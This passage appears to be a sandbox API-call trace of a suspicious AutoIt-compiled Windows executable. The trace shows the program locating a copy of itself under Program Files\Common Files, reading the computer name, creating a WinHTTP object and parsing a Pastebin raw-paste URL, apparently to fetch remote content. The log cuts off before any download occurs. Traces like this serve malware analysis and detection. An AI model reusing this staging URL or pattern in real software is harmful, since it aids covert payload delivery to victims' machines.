(in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpszShortPath=0x8cf77c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x11 [0270.419] GetShortPathNameW (in: lpszLongPath="testers.exe", lpszShortPath=0x8cf77c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x0 [0270.420] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe", lpszShortPath=0x8cf77c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 0x20 [0271.106] Shell_NotifyIconW (dwMessage=0x1, lpData=0x8ded70) returned 1 [0271.106] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd02880 | out: hHeap=0xcc0000) returned 1 [0271.106] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b28 | out: hHeap=0xcc0000) returned 1 [0271.106] KillTimer (hWnd=0xb016c, uIDEvent=0x1) returned 1 [0271.106] SetTimer (hWnd=0xb016c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0271.106] PeekMessageW (in: lpMsg=0x8df6d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df6d4) returned 0 [0271.422] GetComputerNameW (in: lpBuffer=0x8df200, nSize=0x8df51c | out: lpBuffer="XDUWTFONO", nSize=0x8df51c) returned 1 [0271.422] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9b08 [0271.422] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe050 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd018c8 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd06018 | out: hHeap=0xcc0000) returned 1 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01928 | out: hHeap=0xcc0000) returned 1 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01928 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddf388 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe050 | out: hHeap=0xcc0000) returned 1 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd018c8 | out: hHeap=0xcc0000) returned 1 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9b08 | out: hHeap=0xcc0000) returned 1 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9b08 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9b08 | out: hHeap=0xcc0000) returned 1 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9b08 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xb0) returned 0xd02880 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddf388 | out: hHeap=0xcc0000) returned 1 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9b08 | out: hHeap=0xcc0000) returned 1 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9b08 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9b08 | out: hHeap=0xcc0000) returned 1 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd2d2f8 | out: hHeap=0xcc0000) returned 1 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd018d8 | out: hHeap=0xcc0000) returned 1 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01988 | out: hHeap=0xcc0000) returned 1 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe050 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9b08 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01988 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda660 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9ac0 [0271.423] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9af0 | out: hHeap=0xcc0000) returned 1 [0271.423] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0271.423] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd018d8 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe190 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9af0 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd018c8 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda618 [0271.424] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd018c8 | out: hHeap=0xcc0000) returned 1 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda648 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd018c8 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9d48 [0271.424] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd018c8 | out: hHeap=0xcc0000) returned 1 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dd8 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9d78 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd018c8 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01938 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe078 [0271.424] CharUpperBuffW (in: lpsz="AutoIt.Error", cchLength=0xc | out: lpsz="AUTOIT.ERROR") returned 0xc [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01958 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe208 [0271.424] CharUpperBuffW (in: lpsz="MyErrFunc", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0271.424] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe208 | out: hHeap=0xcc0000) returned 1 [0271.424] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01958 | out: hHeap=0xcc0000) returned 1 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddf388 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9b50 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6f0 [0271.424] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe208 [0271.425] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda600 [0271.425] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9b20 [0271.425] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda630 [0271.425] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9d00 [0271.425] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6c0 [0271.425] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6a8 [0271.425] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9bc8 [0271.425] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dc0 [0271.425] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xcfb048 [0271.425] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe208 | out: hHeap=0xcc0000) returned 1 [0271.425] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6d8 [0271.425] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9b50 | out: hHeap=0xcc0000) returned 1 [0271.425] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe208 [0271.425] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01958 [0271.426] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe078 | out: hHeap=0xcc0000) returned 1 [0271.426] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01938 | out: hHeap=0xcc0000) returned 1 [0271.426] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9d78 | out: hHeap=0xcc0000) returned 1 [0271.426] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd018c8 | out: hHeap=0xcc0000) returned 1 [0271.426] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9dd8 | out: hHeap=0xcc0000) returned 1 [0271.426] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dd8 [0271.426] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda618 | out: hHeap=0xcc0000) returned 1 [0271.426] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9af0 | out: hHeap=0xcc0000) returned 1 [0271.426] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9d48 | out: hHeap=0xcc0000) returned 1 [0271.426] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda648 | out: hHeap=0xcc0000) returned 1 [0271.426] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe190 | out: hHeap=0xcc0000) returned 1 [0271.426] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd018d8 | out: hHeap=0xcc0000) returned 1 [0271.426] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe190 [0271.426] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda648 [0271.426] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd018d8 [0271.426] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda648 | out: hHeap=0xcc0000) returned 1 [0271.426] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe078 [0271.426] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda648 [0271.426] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9d48 [0271.427] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9dd8 | out: hHeap=0xcc0000) returned 1 [0271.427] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0271.427] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd018c8 [0271.427] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe230 [0271.427] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dd8 [0271.427] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01938 [0271.427] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9af0 [0271.427] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01938 | out: hHeap=0xcc0000) returned 1 [0271.427] CoInitialize (pvReserved=0x0) returned 0x1 [0271.427] CoUninitialize () [0271.427] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x3c) returned 0xcfb120 [0271.427] CLSIDFromProgID (in: lpszProgID="winhttp.winhttprequest.5.1", lpclsid=0xcfb138 | out: lpclsid=0xcfb138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95))) returned 0x0 [0271.433] CoCreateInstance (in: rclsid=0xcfb138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95)), pUnkOuter=0x0, dwClsContext=0x5, riid=0xcfb148*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8df4c8 | out: ppv=0x8df4c8*=0xd0dc30) returned 0x0 [0271.445] WinHttpRequest:IUnknown:QueryInterface (in: This=0xd0dc30, riid=0x322c9c*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x8df498 | out: ppvObject=0x8df498*=0x0) returned 0x80004002 [0271.445] WinHttpRequest:IUnknown:QueryInterface (in: This=0xd0dc30, riid=0x322c4c*(Data1=0x10a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8df498 | out: ppvObject=0x8df498*=0x0) returned 0x80004002 [0271.445] WinHttpRequest:IUnknown:QueryInterface (in: This=0xd0dc30, riid=0x322c0c*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xcfb128 | out: ppvObject=0xcfb128*=0xd0dc30) returned 0x0 [0271.445] WinHttpRequest:IUnknown:Release (This=0xd0dc30) returned 0x1 [0271.445] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda510 [0271.445] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda498 [0271.445] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda498 | out: hHeap=0xcc0000) returned 1 [0271.445] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9af0 | out: hHeap=0xcc0000) returned 1 [0271.445] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9dd8 | out: hHeap=0xcc0000) returned 1 [0271.445] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe230 | out: hHeap=0xcc0000) returned 1 [0271.446] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd018c8 | out: hHeap=0xcc0000) returned 1 [0271.446] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe230 [0271.446] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dd8 [0271.446] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd018c8 [0271.446] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9af0 [0271.446] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda498 [0271.446] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda510 | out: hHeap=0xcc0000) returned 1 [0271.446] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0271.446] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01b58 [0271.446] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda510 [0271.446] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01b48 [0271.446] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda4b0 [0271.446] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01b38 [0271.446] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe488 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda4c8 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda450 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda468 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda480 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda408 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda420 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda438 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda3c0 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda3d8 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda3f0 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01b28 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda378 [0271.447] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b28 | out: hHeap=0xcc0000) returned 1 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe4b0 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda390 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3a8 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01b28 [0271.447] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda378 | out: hHeap=0xcc0000) returned 1 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01b18 [0271.447] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe4d8 [0271.447] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0271.447] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe4d8 | out: hHeap=0xcc0000) returned 1 [0271.447] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b18 | out: hHeap=0xcc0000) returned 1 [0271.448] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda378 [0271.448] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xcfb318 [0271.448] PeekMessageW (in: lpMsg=0x8defdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8defdc) returned 0 [0271.448] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe4d8 [0271.448] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda330 [0271.448] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01b18 [0271.448] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda348 [0271.448] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b18 | out: hHeap=0xcc0000) returned 1 [0271.448] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda360 [0271.448] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda348 | out: hHeap=0xcc0000) returned 1 [0271.448] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda330 | out: hHeap=0xcc0000) returned 1 [0271.448] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe4d8 | out: hHeap=0xcc0000) returned 1 [0271.448] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcd33f0 | out: hHeap=0xcc0000) returned 1 [0271.448] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce50e0 | out: hHeap=0xcc0000) returned 1 [0271.448] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda360 | out: hHeap=0xcc0000) returned 1 [0271.448] PeekMessageW (in: lpMsg=0x8defdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8defdc) returned 0 [0271.448] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xce50e0 [0271.448] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda360 [0271.448] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce50e0 | out: hHeap=0xcc0000) returned 1 [0271.448] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe4d8 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda330 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce50e0 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda348 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2e8 [0271.449] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda360 | out: hHeap=0xcc0000) returned 1 [0271.449] PeekMessageW (in: lpMsg=0x8defdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8defdc) returned 0 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01b18 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe500 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda360 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01b08 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe528 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda300 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01af8 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda318 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01ae8 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xd2d3d8 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2a0 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01ad8 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x50) returned 0xd43938 [0271.449] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2a0 | out: hHeap=0xcc0000) returned 1 [0271.449] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd2d3d8 | out: hHeap=0xcc0000) returned 1 [0271.449] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ae8 | out: hHeap=0xcc0000) returned 1 [0271.449] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01af8 | out: hHeap=0xcc0000) returned 1 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x50) returned 0xd439e8 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01af8 [0271.449] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2a0 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01ae8 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2b8 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01ac8 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2d0 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01ab8 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda258 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01aa8 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda270 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01a98 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda288 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01a88 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda210 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01a78 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda228 [0271.450] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01a68 [0271.450] InternetCrackUrlW (in: lpszUrl="http://pastebin.com/raw.php?i=7MDswaSn", dwUrlLength=0x26, dwFlags=0x0, lpUrlComponents=0x8de928 | out: lpUrlComponents=0x8de928) returned 1 [0271.526] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2d0 | out: hHeap=0xcc0000) returned 1 [0271.526] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcff1f8 [0271.527] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda288 | out: hHeap=0xcc0000) returned 1 [0271.527] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcff248 [0271.527] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda210 | out: hHeap=0xcc0000) returned 1 [0271.527] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcff270 [0271.527] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x28) returned 0xcfc480 [0271.527] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01c68 [0271.527] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda228 | out: hHeap=0xcc0000) returned 1 [0271.527] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xd0ffe0 [0271.527] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfc480 | out: hHeap=0xcc0000) returned 1 [0271.527] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01c68 | out: hHeap=0xcc0000) returned 1 [0271.527] InternetOpenW 